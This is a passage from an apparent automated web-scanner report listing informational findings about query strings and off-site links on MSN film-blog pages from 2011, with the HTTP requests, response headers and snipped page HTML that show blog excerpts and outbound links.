<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg" />Whatever Ricky Gervais haters. When he&#39;s in the right element, he rules. <br />
...[SNIP]...
<br />Watch it <a href="http&#58;&#47;&#47;www.youtube.com&#47;watch&#63;v&#61;tsafwBj4t1s&#38;feature&#61;player_embedded" title="http&#58;&#47;&#47;www.youtube.com&#47;watch&#63;v&#61;tsafwBj4t1s&#38;feature&#61;player_embedded">here</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg" />&#34;The Hobbit&#34; has had so many setbacks, but this one, the director&#39;s health, is most troublesome. According to reports, he&#39;s in the clear, but we all hope for Peter Jackson&#39;s speedy
...[SNIP]...
<br />Here&#39;s more from <a href="http&#58;&#47;&#47;www.nextmovie.com&#47;blog&#47;peter-jackson-hospitalized&#47;" title="http&#58;&#47;&#47;www.nextmovie.com&#47;blog&#47;peter-jackson-hospitalized&#47;">Next Movie</a>
...[SNIP]...
<p>Yes, unfortunately, it&#8217;s true&#58; according to the New Zealand website <a href="http&#58;&#47;&#47;www.stuff.co.nz&#47;national&#47;4589305&#47;Sir-Peter-Jacksons-stomach-ulcer-scare" title="http&#58;&#47;&#47;www.stuff.co.nz&#47;national&#47;4589305&#47;Sir-Peter-Jacksons-stomach-ulcer-scare">Stuff</a>
...[SNIP]...
<p><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper&#37;20crop.jpg" />With such wonderfully eclectic, innovative, moving, funny, disturbing and beautifully crafted shorts to choose from, Sundance jury duty was not an easy task.</p>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg" />Will &#34;The King&#39;s Speech&#34; reign at the Oscars&#63; And even, in spite of most Oscar oddsmakers, win Best Picture&#63;<br />
...[SNIP]...
<br />Here&#39;s more from <a href="http&#58;&#47;&#47;www.thewrap.com&#47;awards&#47;column-post&#47;not-so-fast-weve-got-ourselves-oscar-race-24153" title="http&#58;&#47;&#47;www.thewrap.com&#47;awards&#47;column-post&#47;not-so-fast-weve-got-ourselves-oscar-race-24153">TheWrap</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg" />Kevin Smith doesn&#39;t need Hollywood. Or, he doesn&#39;t <i>
...[SNIP]...
<br />Here&#39;s <a href="http&#58;&#47;&#47;www.huffingtonpost.com&#47;2011&#47;01&#47;24&#47;kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html" title="http&#58;&#47;&#47;www.huffingtonpost.com&#47;2011&#47;01&#47;24&#47;kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html">more</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg" />There are&#160;lots of films to go through at this year&#39;s Sundance Film Festival, and many to be excited for, whether you&#39;re here or not. <br />
...[SNIP]...
<br />Check&#160;out all of their picks <a href="http&#58;&#47;&#47;www.thewrap.com&#47;movies&#47;slideshow&#47;sundance-2011-10-films-were-dying-see-slideshow-24046" title="http&#58;&#47;&#47;www.thewrap.com&#47;movies&#47;slideshow&#47;sundance-2011-10-films-were-dying-see-slideshow-24046">here</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.sunsetgun.com">Kim Morgan</a>
...[SNIP]...
<li class="first"><a href="http://www.slashfilm.com">/film</a></li><li><a href="http://blog.brightlightsfilm.com/">Bright Lights After Dark</a>
...[SNIP]...
<li><a href="http://chud.com/articles/">Chud</a></li><li><a href="http://www.cinematical.com">Cinematical</a>
...[SNIP]...
<li><a href="http://filmexperience.blogspot.com/">The Film Experience</a>
...[SNIP]...
<li><a href="http://finalgirl.blogspot.com">Final Girl</a></li><li><a href="http://daily.greencine.com">Green Cine</a></li><li><a href="http://www.hitfix.com">HitFix</a></li><li><a href="http://www.riskybusinessblog.com">Hollywood Reporter Risky Business Blog</a>
...[SNIP]...
<li><a href="http://thehousenextdooronline.com">The House Next Door</a>
...[SNIP]...
<li><a href="http://sunsetgun.typepad.com/sunsetgun/">Kim Morgan's Sunset Gun</a>
...[SNIP]...
<li><a href="http://www.moviecitynews.com/">Movie City News</a>
...[SNIP]...
<li><a href="http://www.avclub.com">Onion AV Club</a>
...[SNIP]...
<li><a href="http://theplaylist.blogspot.com">The Playlist</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/scanners/">Scanners</a></li><li><a href="http://selfstyledsiren.blogspot.com">Self Styled Siren</a>
...[SNIP]...
<li><a href="http://sergioleoneifr.blogspot.com">Sergio Leone and Infield Fly Rule</a>
...[SNIP]...
<li><a href="http://www.sheilaomalle.com">The Sheila Variations</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott">Vanity Fair's James Wolcott</a>
...[SNIP]...
<li class="last"><a href="http://www.thewrap.com">The Wrap</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.298. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/blogs/videodrone-blog.aspx?feat=aa535894-05e0-444f-9db6-fdb0cec6194f HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afd3cab45acc418383093f3b38fe3af9; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=66AC91F9F7EA4FC1AD239A8120CE3CC1; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406663&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg" />While many of the front-runners were released late in the year and are still playing in theaters -- best picture nominees &#34;<a href="http&#58;&#47;&#47;movies.redacted&#47;movies&#47;movie&#47;black-
...[SNIP]...
<p>The Film Forum in New York begins the two-week retrospective &#34;<a href="http&#58;&#47;&#47;www.filmforum.org&#47;films&#47;lang.html" title="http&#58;&#47;&#47;www.filmforum.org&#47;films&#47;lang.html">Fritz Lang&#160; in Hollywood</a>
...[SNIP]...
surveys the German legend&#39;s work during his American exile&#58; all 22 films he made in the United States between 1934 to 1956, in 35mm. It&#39;s the film event of the moment in New York &#40;see <a href="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;movies&#47;23dargis.html&#63;_r&#61;1" title="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;movies&#47;23dargis.html&#63;_r&#61;1">Manohla Dargis in The New York Times</a>, &#160;<a href="http&#58;&#47;&#47;www.villagevoice.com&#47;2011-01-26&#47;film&#47;the-american-films-of-mad-genius-fritz-lang-expand-genres&#47;" title="http&#58;&#47;&#47;www.villagevoice.com&#47;2011-01-26&#47;film&#47;the-american-films-of-mad-genius-fritz-lang-expand-genres&#47;">J. Hoberman in The Village Voice</a>, <a href="http&#58;&#47;&#47;www.movingimagesource.us&#47;articles&#47;the-other-fritz-lang-20110127" title="http&#58;&#47;&#47;www.movingimagesource.us&#47;articles&#47;the-other-fritz-lang-20110127">Cullen Gallagher at Moving Image Source</a>, <a href="http&#58;&#47;&#47;www.thelmagazine.com&#47;newyork&#47;the-fury-fritz-lang-in-hollywood&#47;Content&#63;oid&#61;1926813" title="http&#58;&#47;&#47;www.thelmagazine.com&#47;newyork&#47;the-fury-fritz-lang-in-hollywood&#47;Content&#63;oid&#61;1926813">Dan Callahan in The L</a>
...[SNIP]...
<p><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You&#37;20Only&#37;20Live&#37;20Once_02_300.jpg" />Those of us outside of the Big Apple may not be able to join the crowds for the glory of such classics &#40;both major and minor&#41; projected on the big screen, but Fritz Lang is a filmmaker well rep
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg" alt="" class="imagefloatright userImage lead" />Universal announces the release of the critical darling "<b>
...[SNIP]...
<p><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg" />This run of episodes features the Britney episode &#40;with Britney Spears herself making a cameo in the gas-induced hallucination musical numbers&#41;, &#34;The Rocky Horror Glee Show&#34; &#40;direct
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
<i><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg" alt="" class="imagefloatleft userImage lead" /></i>
...[SNIP]...
<b><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg" /></b>
...[SNIP]...
<br /><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg" /><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg" /><br />
...[SNIP]...
</b>," the famously unavailable feature film directed by and starring Dylan, is coming to DVD. <a href="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased" title="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased">Levi Asher at Literary Kicks</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg" alt="" class="imagefloatleft userImage lead" />Dylan pulled together friends, lovers and collaborators for the film. Sam Shepard and Allen Ginsberg reportedly co-wrote the script, Dylan starred with his then-wife Sarah Dylan while Ronnie Hawkins pl
...[SNIP]...
<br />Don't get your hopes up. Steven Gaydos, writing on <a href="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html" title="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html">Variety's Soundcheck music blog</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.299. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/blogs/videodrone-blog.aspx?feat=aa535894-05e0-444f-9db6-fdb0cec6194f HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6ac4861c5c434fd290fbfb834551bfcf; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C1973B82CE2546AAB5E67F5D4F163D64; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345053&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg" />While many of the front-runners were released late in the year and are still playing in theaters -- best picture nominees &#34;<a href="http&#58;&#47;&#47;movies.redacted&#47;movies&#47;movie&#47;black-
...[SNIP]...
<p>The Film Forum in New York begins the two-week retrospective &#34;<a href="http&#58;&#47;&#47;www.filmforum.org&#47;films&#47;lang.html" title="http&#58;&#47;&#47;www.filmforum.org&#47;films&#47;lang.html">Fritz Lang&#160; in Hollywood</a>
...[SNIP]...
surveys the German legend&#39;s work during his American exile&#58; all 22 films he made in the United States between 1934 to 1956, in 35mm. It&#39;s the film event of the moment in New York &#40;see <a href="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;movies&#47;23dargis.html&#63;_r&#61;1" title="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;movies&#47;23dargis.html&#63;_r&#61;1">Manohla Dargis in The New York Times</a>, &#160;<a href="http&#58;&#47;&#47;www.villagevoice.com&#47;2011-01-26&#47;film&#47;the-american-films-of-mad-genius-fritz-lang-expand-genres&#47;" title="http&#58;&#47;&#47;www.villagevoice.com&#47;2011-01-26&#47;film&#47;the-american-films-of-mad-genius-fritz-lang-expand-genres&#47;">J. Hoberman in The Village Voice</a>, <a href="http&#58;&#47;&#47;www.movingimagesource.us&#47;articles&#47;the-other-fritz-lang-20110127" title="http&#58;&#47;&#47;www.movingimagesource.us&#47;articles&#47;the-other-fritz-lang-20110127">Cullen Gallagher at Moving Image Source</a>, <a href="http&#58;&#47;&#47;www.thelmagazine.com&#47;newyork&#47;the-fury-fritz-lang-in-hollywood&#47;Content&#63;oid&#61;1926813" title="http&#58;&#47;&#47;www.thelmagazine.com&#47;newyork&#47;the-fury-fritz-lang-in-hollywood&#47;Content&#63;oid&#61;1926813">Dan Callahan in The L</a>
...[SNIP]...
<p><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You&#37;20Only&#37;20Live&#37;20Once_02_300.jpg" />Those of us outside of the Big Apple may not be able to join the crowds for the glory of such classics &#40;both major and minor&#41; projected on the big screen, but Fritz Lang is a filmmaker well rep
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg" alt="" class="imagefloatright userImage lead" />Universal announces the release of the critical darling "<b>
...[SNIP]...
<p><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg" />This run of episodes features the Britney episode &#40;with Britney Spears herself making a cameo in the gas-induced hallucination musical numbers&#41;, &#34;The Rocky Horror Glee Show&#34; &#40;direct
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
<i><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg" alt="" class="imagefloatleft userImage lead" /></i>
...[SNIP]...
<b><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg" /></b>
...[SNIP]...
<br /><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg" /><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg" /><br />
...[SNIP]...
</b>," the famously unavailable feature film directed by and starring Dylan, is coming to DVD. <a href="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased" title="http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased">Levi Asher at Literary Kicks</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg" alt="" class="imagefloatleft userImage lead" />Dylan pulled together friends, lovers and collaborators for the film. Sam Shepard and Allen Ginsberg reportedly co-wrote the script, Dylan starred with his then-wife Sarah Dylan while Ronnie Hawkins pl
...[SNIP]...
<br />Don't get your hopes up. Steven Gaydos, writing on <a href="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html" title="http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html">Variety's Soundcheck music blog</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.300. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blogpost.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174 HTTP/1.1
